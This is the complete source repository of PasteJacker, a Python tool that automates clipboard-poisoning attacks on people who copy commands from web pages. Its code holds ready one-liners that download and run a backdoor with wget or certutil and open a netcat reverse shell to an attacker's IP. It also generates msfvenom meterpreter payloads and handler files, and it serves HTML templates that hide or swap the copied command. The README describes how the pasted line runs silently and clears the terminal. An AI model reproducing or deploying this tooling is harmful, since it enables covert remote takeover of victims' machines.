├── .github └── FUNDING.yml ├── MANIFEST.in ├── PasteJacker ├── .gitignore ├── Core │ ├── Data │ │ └── version.txt │ ├── __init__.py │ ├── checkers.py │ ├── color.py │ ├── dictionaries.py │ ├── serve.py │ ├── settings.py │ ├── updater.py │ └── utils.py ├── Screenshots │ ├── p0.png │ ├── p1.png │ ├── p2.png │ └── p3.png ├── __init__.py ├── main.py └── templates │ ├── __init__.py │ ├── color_method.html │ ├── js_method.html │ └── style_method.html ├── README.md └── setup.py /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: D4Vinci 2 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | recursive-include PasteJacker/ * 2 | -------------------------------------------------------------------------------- /PasteJacker/.gitignore: -------------------------------------------------------------------------------- 1 | # Welcome to my gitignore file :') 2 | # Byte-compiled / optimized / DLL files 3 | __pycache__/ 4 | *.py[cod] 5 | *$py.class 6 | 7 | # Installer logs 8 | pip-log.txt 9 | pip-delete-this-directory.txt 10 | 11 | # pyenv 12 | .python-version 13 | 14 | # Environments 15 | .env 16 | .venv 17 | env/ 18 | venv/ 19 | ENV/ 20 | 21 | #log files 22 | *.log 23 | -------------------------------------------------------------------------------- /PasteJacker/Core/Data/version.txt: -------------------------------------------------------------------------------- 1 | 0.2 2 | -------------------------------------------------------------------------------- /PasteJacker/Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Core/__init__.py -------------------------------------------------------------------------------- /PasteJacker/Core/checkers.py: -------------------------------------------------------------------------------- 1 | import subprocess,os,socket 2 | 3 | def msfvenom(): 4 | cmd = subprocess.Popen("which msfvenom",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 5 | output,error=cmd.communicate() 6 | if error==output: 7 | return False 8 | return True 9 | 10 | def our_folder(): 11 | if not os.path.exists("/root/.pastejacker"): 12 | os.mkdir("/root/.pastejacker") 13 | 14 | def port_in_use(port): 15 | try: 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | s.bind(("127.0.0.1", port)) 18 | s.close() 19 | return False # Port not in use 20 | except socket.error: 21 | s.close() 22 | return True # Port in use 23 | -------------------------------------------------------------------------------- /PasteJacker/Core/color.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # Written by: Karim shoair - D4Vinci 3 | import os,sys 4 | global G, Y, B, R, W , M , C , end ,Bold,underline 5 | G,Y,B,R,W,M,C,end= '\033[92m','\033[93m','\033[94m','\033[91m','\x1b[37m','\x1b[35m','\x1b[36m','\033[0m' 6 | Bold = "\033[1m" 7 | underline = "\033[4m" 8 | 9 | def numbered(n,text,spaces=2): 10 | if "(" in text and ")" in text: 11 | text = text.split("(")[0] +end+R+Bold +"(" +text.split("(")[1] 12 | return( " "*spaces+Bold+W+"["+G+str(n)+W+"] "+G+text+end ) 13 | 14 | def colored_input(title="menu",spaces=3): 15 | spaces = " "*spaces 16 | print(G+spaces+"│") 17 | line = G+spaces+"└──["+R+"PasteJacker"+G+"]──["+R+"~"+G+"]─["+B+title+G+"]: "+end 18 | return input(line) 19 | 20 | def status(text): 21 | print( " "*2+C+"[+] "+Bold+G+text+end ) 22 | 23 | def error(text): 24 | print( " "*2+M+"[!] "+Bold+R+text+end ) 25 | -------------------------------------------------------------------------------- /PasteJacker/Core/dictionaries.py: -------------------------------------------------------------------------------- 1 | from . import settings, utils 2 | from .color import * 3 | import copy 4 | 5 | linux = { "Download and execute a msfvenom backdoor using wget (Web delivery + PasteJacking)":"wget http://{ip}:{port}/main.elf &> /dev/null && chmod +x ./main.elf && ./main.elf & disown", 6 | "Get me a simple reverse connection using netcat (Reverse connection + PasteJacking)":"nc -e /bin/sh {ip} {port} & disown", 7 | "Only serve my custom one-liner and do your PasteJacking thing! (PasteJacking only!)":None 8 | } 9 | windows = { "Download and execute a msfvenom backdoor using certutil (Web delivery + PasteJacking)":"certutil.exe -urlcache -split -f http://{ip}:{port}/main.exe main.exe 2>&1 && main.exe", 10 | "Only serve my custom one-liner and do your PasteJacking thing! (PasteJacking only!)":None 11 | } 12 | 13 | final_touches = { 14 | "Windows":"cls & {liner} & cls &", 15 | "Linux":"clear; {liner} && clear;" 16 | } 17 | 18 | escapes = { 19 | "Windows":[">NUL 2>&1 &","REM "], 20 | "Linux":["&>/dev/null;","#"] 21 | } 22 | 23 | metasploit_modules = { 24 | "Windows":[ 25 | "windows/meterpreter/reverse_tcp", 26 | "windows/meterpreter/reverse_http", 27 | "windows/meterpreter/reverse_https", 28 | "windows/shell/reverse_tcp"], 29 | "Linux":[ 30 | "linux/x86/meterpreter/reverse_tcp", 31 | "linux/x86/meterpreter_reverse_http", 32 | "linux/x86/meterpreter_reverse_https", 33 | "linux/x86/shell/reverse_tcp", 34 | "linux/x64/meterpreter/reverse_tcp", 35 | "linux/x64/meterpreter_reverse_http", 36 | "linux/x64/meterpreter_reverse_https", 37 | "linux/x64/shell/reverse_tcp" 38 | ] 39 | } 40 | 41 | # Was printing the advantages and disadvantages in the tool before but now no 42 | pastejacking = { 43 | "Using span style attribute to hide our lines.":{ 44 | "file":'style_method.html', 45 | "advantages":"Doesn't require javascript to be enabled. Works on all browsers.", 46 | "disadvantages":"Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines." 47 | }, 48 | "Using javascript to hook the copy event and replace copied data.":{ 49 | "file":'js_method.html', 50 | "advantages":"Anything the user copies in the page will be replaced with our line. Command executed by itself once target paste it without pressing enter.", 51 | "disadvantages":"Requires javascript to be enabled on the target browser." 52 | }, 53 | "Using span style again but this time to make our text transparent and non-markable":{ 54 | "file":'color_method.html', 55 | "advantages":"Doesn't require javascript to be enabled.", 56 | "disadvantages":"Target must select all the text in the page to ensure that he copies our hidden malicious lines. Not working on opera and chrome." 57 | } 58 | } 59 | def save_os_type(choice): 60 | settings.os = { 61 | 1:"Windows", 62 | 2:"Linux" 63 | }[choice] 64 | 65 | def get_liners(keys_only=True): 66 | if keys_only: 67 | return list(linux.keys()) if settings.os == "Linux" else list(windows.keys()) 68 | else: 69 | return linux if settings.os == "Linux" else windows 70 | 71 | def set_liner(liner_choice): 72 | liners = get_liners(False) 73 | liners_keys = list( liners.keys() ) 74 | liner = liners_keys[int(liner_choice)-1] 75 | if "custom" in liner: 76 | while True: 77 | settings.liner=settings.final_liner=colored_input("Enter your one-liner",spaces=7) 78 | if settings.liner: 79 | break 80 | touches = final_touches[settings.os] 81 | settings.final_liner = touches.format(liner=settings.final_liner) 82 | return 0 83 | 84 | elif "netcat" in liner: 85 | ip,port = utils.ask_for_ip_port() 86 | settings.liner = liners[liner].format(ip=ip,port=port) 87 | prepare_liner(ip,port) 88 | return 1 89 | 90 | else: 91 | settings.liner = liners[liner] 92 | return 2 93 | 94 | def get_payloads(): 95 | return metasploit_modules[settings.os] 96 | 97 | def prepare_liner(ip,port): 98 | settings.final_liner = settings.liner.format(ip=ip,port=port) 99 | touches = final_touches[settings.os] 100 | settings.final_liner = touches.format(liner=settings.final_liner) 101 | 102 | def get_templates(): 103 | temp = copy.deepcopy(pastejacking) 104 | for template in temp: 105 | blah = temp[template].pop("file") 106 | return temp 107 | 108 | def set_template(templates_choice): 109 | templates_keys = list( pastejacking.keys() ) 110 | template = templates_keys[int(templates_choice)-1] 111 | settings.template = pastejacking[template]["file"] 112 | 113 | def get_escapes(): 114 | return escapes[settings.os] 115 | -------------------------------------------------------------------------------- /PasteJacker/Core/serve.py: -------------------------------------------------------------------------------- 1 | import os, socketserver, http.server, _thread as thread 2 | from jinja2 import Environment, PackageLoader, FileSystemLoader 3 | from . import utils 4 | global httpd, directory_before_serve 5 | httpd,directory_before_serve = [None]*2 6 | 7 | def render(template_name,*args,**kwargs): 8 | env = Environment(loader=FileSystemLoader(searchpath=utils.get_templates_dir())) 9 | template = env.get_template(template_name) 10 | return template.render(*args,**kwargs) 11 | 12 | def make_index(template_data): 13 | f = open("/root/.pastejacker/index.html","w") 14 | f.write(template_data) 15 | f.close() 16 | 17 | def start_web_server(directory,port=80): 18 | global httpd, directory_before_serve 19 | class ReusableTCPServer(socketserver.TCPServer): 20 | allow_reuse_address = True 21 | # specify the httpd service on 0.0.0.0 (all interfaces) on port 80 22 | httpd = ReusableTCPServer( ("0.0.0.0", port), http.server.SimpleHTTPRequestHandler) 23 | directory_before_serve = os.getcwd() 24 | os.chdir(directory) 25 | thread.start_new_thread(httpd.serve_forever, ()) 26 | 27 | def stop_web_server(): 28 | httpd.socket.close() 29 | os.chdir(directory_before_serve) 30 | -------------------------------------------------------------------------------- /PasteJacker/Core/settings.py: -------------------------------------------------------------------------------- 1 | global os, liner, final_liner, template, ip 2 | 3 | os = None 4 | liner = None 5 | final_liner = None 6 | template = None 7 | ip = None 8 | -------------------------------------------------------------------------------- /PasteJacker/Core/updater.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | from .color import * 4 | from . import utils 5 | from urllib.request import urlopen 6 | 7 | def check(): 8 | f = open( utils.add_corefilepath("Data","version.txt"), 'r') 9 | file_data = f.read().strip() 10 | try: 11 | version = urlopen('https://raw.githubusercontent.com/D4Vinci/PasteJacker/master/PasteJacker/Core/Data/version.txt').read().decode('utf-8').strip() 12 | except: 13 | error("Can't reach Internet !!!") 14 | sys.exit(0) 15 | 16 | if version != file_data: 17 | return file_data+R+" but new version is available!" 18 | else: 19 | return file_data 20 | -------------------------------------------------------------------------------- /PasteJacker/Core/utils.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | import os,time,subprocess,pkg_resources 4 | from . import updater 5 | from .color import * 6 | 7 | banner = """{G} 8 | /T /I 9 | / |/ | .-~/ 10 | T\ Y I |/ / _ 11 | /T | \I | I Y.-~/ 12 | I l /I T\ | | l | T / 13 | __ | \l \l \I l __l l \ ` _. | 14 | \ ~-l `\ `\ \ \\ ~\ \ `. .-~ | 15 | \ ~-. "-. ` \ ^._ ^. "-. / \ | 16 | .--~-._ ~- ` _ ~-_.-"-." ._ /._ ." ./ 17 | >--. ~-. ._ ~>-" "\\\ 7 7 ] 18 | ^.___~"--._ ~-( .-~ . `\ Y . / | 19 | <__ ~"-. ~ /_/ \ \I Y : | 20 | ^-.__ ~(_/ \ >._: | l______ 21 | ^--.,___.-~" /_/ ! `-.~"--l_ / ~"-. 22 | (_/ . ~( /' "~"--,Y -{W}=b{G}-. _) ______ _ ___ _ 23 | (_/ . \ : / l c"~o \\ | ___ \ | | |_ | | | 24 | \ / `. . .^ \_.-~"~--. ) | |_/ /_ _ ___| |_ ___ | | __ _ ___| | _____ _ __ 25 | (_/ . ` / / ! )/ | __/ _` / __| __/ _ \ | |/ _` |/ __| |/ / _ \ '__| 26 | / / _. '. .': / ' | | | (_| \__ \ || __/\__/ / (_| | (__| < __/ | 27 | ~(_/ . / _ ` .-<_ \_| \__,_|___/\__\___\____/ \__,_|\___|_|\_\___|_| 28 | /_/ . ' .-~" `. / \ \ ,z=. /─────────────────────────────────────────────────────\\ 29 | ~( / ' : | K "-.~-.______// {W}[{Y}=>{W}] PasteJacking attacks automation with a style. [{Y}<={W}]{G} 30 | "-,. l I/ \_ __(--->._(==. {W}[{Y}=>{W}] {B}Created by: {R}Karim Shoair (D4Vinci) {W}[{Y}<={W}]{G} 31 | //( \ < ~"~" // {W}[{Y}=>{W}] {B}Version: {R}{version} {W}[{Y}<={W}]{G} 32 | /' /\ \ \ ,v=. (( {W}[{Y}=>{W}] {B}Codename:{R} Hijack {W}[{Y}<={W}]{G} 33 | .^. / /\ " )__ //===- ` {W}[{Y}=>{W}] {B}Follow me on Twitter: {R}@D4Vinci1 {W}[{Y}<={W}]{G} 34 | / / ' ' "-.,__ (---(==- {W}[{Y}=>{W}] [{Y}<={W}]{G} 35 | .^ ' : T ~" ll {W}[{Y}=>{W}] CHOOSE A TARGET TO BEGIN [{Y}<={W}]{G} 36 | / . . . : | :! \\ \_____________________________________________________/ 37 | (_/ / | | j-" ~^ 38 | ~-<_(_.^-~" 39 | """ 40 | core_dir = pkg_resources.resource_filename('PasteJacker', 'Core') 41 | templates_dir = pkg_resources.resource_filename('PasteJacker', 'templates') 42 | 43 | def add_corefilepath(*args): 44 | return os.path.join(core_dir, *args) 45 | 46 | 47 | def get_templates_dir(): 48 | return templates_dir 49 | 50 | def print_banner(): 51 | os.system("clear") 52 | version = updater.check() 53 | banner_to_print = Bold + banner.format(version=version,Y=Y,B=B,W=W,R=R,G=G) + end 54 | print(banner_to_print) 55 | 56 | def validate_input(num, choices): 57 | try: 58 | num = int(num) 59 | except: 60 | error("Please enter a valid integer!") 61 | time.sleep(0.5) 62 | return False 63 | else: 64 | exit_choice = choices[-1] 65 | if num == exit_choice: 66 | return -1 67 | elif num not in list( range(*choices) ): 68 | error("Please enter a valid choice!") 69 | time.sleep(0.5) 70 | return False 71 | else: 72 | return True 73 | 74 | def print_choices(choices, spaces=None): 75 | if spaces: 76 | print(" "*(spaces+1)+G+"│") 77 | final_choice = "Back" if spaces else "Exit" 78 | for n,line in enumerate([*choices,final_choice]): 79 | current_range = n+1 80 | print( numbered(n+1,line,spaces if spaces else 2) ) 81 | return current_range 82 | 83 | def ask_for_ip_port(spaces=10): 84 | while True: 85 | ip = colored_input("IP to connect back to",spaces) 86 | if not ip: 87 | continue 88 | port = colored_input("Connection port (1337)",spaces) or '1337' 89 | break 90 | return ip,port 91 | 92 | def ask_for_text(): 93 | text = "" 94 | status("Enter the text you want user to see "+B+"(Press enter twice to finish...)") 95 | while True: 96 | line = input(G+" >>> "+end) 97 | if not line: 98 | break 99 | else: 100 | text = text +line+ "
" 101 | return (text or " ") 102 | 103 | def write_resource(payload,ip,port): 104 | data = """use multi/handler 105 | set payload {payload} 106 | set lhost {ip} 107 | set lport {port} 108 | set exitonsession false 109 | exploit -j""" 110 | resource = data.format(**locals()) 111 | f = open("/root/.pastejacker/msf_handler.rc","w") 112 | f.write(resource) 113 | f.close() 114 | 115 | def execute(command): 116 | cmd = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 117 | output,error=cmd.communicate() 118 | if error==output: 119 | return False 120 | return True 121 | -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p0.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p1.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p2.png -------------------------------------------------------------------------------- /PasteJacker/Screenshots/p3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/Screenshots/p3.png -------------------------------------------------------------------------------- /PasteJacker/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/__init__.py -------------------------------------------------------------------------------- /PasteJacker/main.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | # Written by: Karim shoair - D4Vinci 3 | # PasteJacker toolkit 4 | import os,sys,time,readline 5 | from .Core.color import * 6 | from .Core import utils,checkers,serve 7 | from .Core.dictionaries import * 8 | 9 | def menu(): 10 | if os.name=="nt": 11 | print("Sorry, but this tool requires a lot of things that's not on windows!") 12 | sys.exit(0) 13 | 14 | elif os.geteuid()!=0: 15 | print("Sorry, but this tool needs to be executed as root!") 16 | sys.exit(0) 17 | 18 | utils.print_banner() 19 | current_range = utils.print_choices(["Windows","Linux"]) 20 | os_type = colored_input() 21 | valid_input = utils.validate_input(os_type, (1,current_range)) 22 | if valid_input==-1: 23 | sys.exit(0) 24 | elif not valid_input: 25 | menu() 26 | else: 27 | checkers.our_folder() 28 | save_os_type( int(os_type) ) 29 | choose_liner_menu() 30 | 31 | def choose_liner_menu(): 32 | methods = get_liners() 33 | while True: 34 | current_range = utils.print_choices(methods, spaces=6) 35 | delivery_method = colored_input("What to do with target",spaces=7) 36 | valid_input = utils.validate_input(delivery_method, (1,current_range)) 37 | if valid_input==-1: 38 | menu() 39 | break 40 | elif valid_input: 41 | temp = set_liner(delivery_method) 42 | if temp in (0,1): 43 | template_menu() 44 | elif temp==2: 45 | metasploit_payloads_menu() 46 | break 47 | 48 | def template_menu(): 49 | templates = get_templates() 50 | templates_to_print = [] 51 | for template in templates: 52 | line = template 53 | #line += end+B+"\t\t\tAdvantages : "+end+G+templates[template]["advantages"]+"\n" 54 | #line += B+"\t\t\tDisadvantages : "+end+G+templates[template]["disadvantages"]+"\n" 55 | templates_to_print.append(line) 56 | while True: 57 | current_range = utils.print_choices(templates_to_print, spaces=14) 58 | template = colored_input("Choose template",spaces=15) 59 | valid_input = utils.validate_input(template, (1,current_range)) 60 | if valid_input==-1: 61 | choose_liner_menu() 62 | break 63 | elif valid_input: 64 | set_template(template) 65 | serve_menu() 66 | break 67 | 68 | 69 | def metasploit_payloads_menu(): 70 | while True: 71 | payloads = get_payloads() 72 | current_range = utils.print_choices(payloads, spaces=10) 73 | payload = colored_input("Metasploit payload to use in generating",spaces=11) 74 | valid_input = utils.validate_input(payload, (1,current_range)) 75 | if valid_input==-1: 76 | choose_liner_menu() 77 | break 78 | else: 79 | ip,port = utils.ask_for_ip_port(spaces=15) # This will be for the msfvenom backdoor so I will ask him for another port for serving 80 | payload = payloads[int(payload)-1] 81 | settings.ip = ip 82 | generation(payload, ip, port) 83 | break 84 | 85 | def generation(payload,ip,port): 86 | if not checkers.msfvenom(): 87 | error("Can't generate a payload as msfvenom is not installed! (Or can't detect it)") 88 | time.sleep(1) 89 | menu() 90 | else: 91 | f = "elf" if "linux" in payload else "exe" 92 | c = utils.execute("msfvenom -p "+payload+" LHOST=" + ip + " LPORT=" + str(port) + " -f "+f+" >/root/.pastejacker/main."+f) 93 | if not c: 94 | error("Failed to generate msfvenom backdoor!") 95 | sys.exit(1) 96 | else: 97 | status("MSFVenom backdoor saved as "+M+" /root/.pastejacker/main."+f+end) 98 | utils.write_resource(payload,ip,port) 99 | status("Metasploit resource file saved as "+M+" /root/.pastejacker/msf_handler.rc"+end) 100 | template_menu() 101 | 102 | def serve_menu(): 103 | while True: 104 | port = colored_input("Port to serve on (80)",spaces=18) or 80 105 | try: 106 | port = int(port) 107 | except: 108 | error("Please enter a valid port!") 109 | time.sleep(1) 110 | continue 111 | else: 112 | if checkers.port_in_use(port): 113 | error("Port "+B+str(port)+R+" is already in use, kill the running service or choose another port!") 114 | continue 115 | if not settings.final_liner: 116 | prepare_liner(settings.ip,port) 117 | msg = utils.ask_for_text() 118 | b,c = msg.split(" ")[0], " ".join(msg.split(" ")[1:]) 119 | final_serve(port, b, c, get_escapes()) 120 | break 121 | 122 | def final_serve(port,b,c,escape): 123 | status("Now let's start serving...") 124 | esc1,esc2=escape 125 | if settings.template=="js_method.html": # To escape the quotes 126 | settings.final_liner = settings.final_liner.replace("'","\\'") 127 | data = serve.render(settings.template, payload=settings.final_liner, fake_p1=b, fake_p2=" "+c+"\r\n", escape_p1=esc1, escape_p2=esc2) 128 | serve.make_index(data) 129 | serve.start_web_server("/root/.pastejacker/",port) 130 | status("Serving on port "+R+str(port)) 131 | print(G+"-"*30+end) 132 | while True: 133 | try: 134 | time.sleep(1) 135 | continue 136 | except KeyboardInterrupt: 137 | serve.stop_web_server() 138 | print("") 139 | status("Webserver stopped!") 140 | break 141 | -------------------------------------------------------------------------------- /PasteJacker/templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/PasteJacker/85a29f9dc7f1f72bff697c0903eee062afabac67/PasteJacker/templates/__init__.py -------------------------------------------------------------------------------- /PasteJacker/templates/color_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {{fake_p1 | safe}} 4 | {{escape_p1}} {{payload}} {{escape_p2}} 5 | {{fake_p2 | safe}} 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /PasteJacker/templates/js_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | {{fake_p1 | safe}} {{fake_p2 | safe}} 4 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /PasteJacker/templates/style_method.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

{{fake_p1 | safe}} 4 | 5 | {{escape_p1}} {{payload}} {{escape_p2}} 6 | 7 | {{fake_p2 | safe}} 8 |

9 | 10 | 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PasteJacker [![Python 3.5](https://img.shields.io/badge/Python-3.0+-yellow.svg)](http://www.python.org/download/) ![Version](https://img.shields.io/badge/Version-0.2-red.svg) 2 | 3 | The main purpose of the tool is automating (PasteJacking/Clipboard poisoning/whatever you name it) attack with collecting all the known tricks used in this attack in one place and one automated job as after searching I found there's no tool doing this job the right way :smile: 4 | 5 | Now because this attack depends on what the user will paste, I implemented the Metasploit web-delivery module's idea into the tool so when the user pastes into the terminal, you gets meterpreter session on his device :smile: 6 | 7 | [Watch tutorial on youtube](https://www.youtube.com/watch?v=FfMoCPVjF5Y) 8 | ### What's PasteJacking ? 9 | In short, Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and change its content to something harmful without your knowledge. *[From The Windows club definition](https://www.thewindowsclub.com/what-is-pastejacking)* 10 | 11 | So here what I did is automating the original attack and adding two other tricks to fool the user, using HTML and CSS *Will talk about it* then added meterpreter sessions as I said before. 12 | 13 | ### A simple scenario to make things clear: 14 | 1. The target opens an HTML page served by the tool and this page has anything that makes the user wants to copy from it and paste into the terminal. *Ex: package installation instructions* 15 | 2. Target copies anything from the page then in the background it gets replaced quickly with our liner. 16 | 3. The user pastes into the terminal and before he notices that the line he copied has been changed : 17 | - The line gets executed by itself in the background (Without pressing enter) 18 | - The terminal gets cleared. 19 | - The user sees the terminal is usable again. 20 | - You already got your meterpreter session by this time. 21 | 4. All of that happened in less than second and maybe the user thinks this is a bad program and he won't install it :smile: 22 | 23 | ### This tool uses 3 methods to trick user into copying our payload instead of the command he copies: 24 | + **Using javascript to hook the copy event and replace copied data.** 25 | - Advantages : 26 | 1. Anything the user copies in the page will be replaced with our line. 27 | 2. Command executed by itself once target paste it without pressing enter. 28 | - Disadvantages : 29 | 1. Requires Javascript to be enabled on the target browser. 30 | 31 | 32 | + **Using span style attribute to hide our lines by overwriting.** 33 | - Advantages : 34 | 1. Doesn't require javascript to be enabled. 35 | 2. Works on all browsers. 36 | - Disadvantages : 37 | 1. Target must select all the text in the page or the first two words to ensure that he copies our hidden malicious lines. 38 | 39 | 40 | + **Using span style again but this time to make our text transparent and non-markable.** 41 | - Advantages : 42 | 1. Doesn't require javascript to be enabled. 43 | - Disadvantages : 44 | 1. Target must select all the text in the page to ensure that he copies our hidden malicious lines. 45 | 2. Not working on opera and chrome. 46 | 47 | ##### What's the payload user copies ? 48 | PasteJacker gives you the option to do one of this things: 49 | 1. Generate a msfvenom backdoor on our machine and the liner target gonna copy will download the backdoor on the its machine, through wget or certutil depends on the OS, then executes it on the background without printing anything to the terminal. 50 | 2. Serve a liner that gets you a reverse netcat connection on the target machine running in the background of course. 51 | 3. Serve your **custom** liner like Metasploit web-delivery payload with adding some touches to hide any possible output. 52 | 53 | # Screenshots (Not updated) 54 | 55 | 56 | 57 | 58 | 59 | 60 | ## Installing and requirements 61 | - Python 3 and setuptools module. 62 | - Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04). 63 | - Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course. 64 | - Third-party library ncurses-dev for Ubuntu (Thanks for @mhaskar). 65 | - Root access. 66 | 67 | ### Installing 68 | 69 | + **For Linux :** 70 | ``` 71 | git clone https://github.com/D4Vinci/PasteJacker.git 72 | sudo python3 -m pip install ./PasteJacker 73 | sudo pastejacker 74 | ``` 75 | 76 | ## Updating the framework or the database 77 | - On Linux while you are outside the directory 78 | ``` 79 | cd PasteJacker && git pull && cd .. 80 | sudo python3 -m pip install ./PasteJacker --upgrade 81 | ``` 82 | 83 | ## References 84 | 85 | - [PasteJacking GitHub repo](https://github.com/dxa4481/Pastejacking) 86 | - [Clipboard poisoning attacks on the Mac - Malwarebytes ](https://blog.malwarebytes.com/threat-analysis/2016/05/clipboard-poisoning-attacks-on-the-mac/) 87 | - [Metasploit web-delivery module's source and idea ](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/script/web_delivery.rb) 88 | 89 | ## Contact 90 | - [Twitter](https://twitter.com/D4Vinci1) 91 | 92 | ## Donation 93 | If this tool has been useful for you, feel free to thank me by buying me a coffee or more ;) 94 | 95 | [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci) 96 | 97 | ## Disclaimer 98 | PasteJacker is created to help in penetration testing and it's not responsible for any misuse or illegal purposes. 99 | 100 | Copying a code from this tool or using it in another tool is accepted as you mention where you get it from :smile:. 101 | 102 | > Pull requests are always welcomed :D 103 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os 4 | from setuptools import setup, find_packages 5 | 6 | with open(os.path.join('PasteJacker', 'Core', 'Data', 'version.txt')) as f: 7 | version = f.read().strip() 8 | 9 | with open('README.md') as f: 10 | des = f.read().strip() 11 | 12 | setup(name='PasteJacker', 13 | version=version, 14 | author = "Karim Shoair (D4Vinci)", 15 | description='Hacking systems with the automation of PasteJacking attacks.', 16 | long_description=des, 17 | url='https://github.com/D4Vinci/PasteJacker', 18 | packages=find_packages(exclude=['ez_setup', 'examples', 'tests']), 19 | include_package_data=True, 20 | install_requires=[ 21 | 'Jinja2', 22 | 'readline;platform_system!="Windows"', 23 | 'gnureadline;platform_system!="Windows"' 24 | ], 25 | entry_points={ 26 | 'console_scripts': [ 27 | 'pastejacker = PasteJacker.main:menu', 28 | ], 29 | }, 30 | ) 31 | --------------------------------------------------------------------------------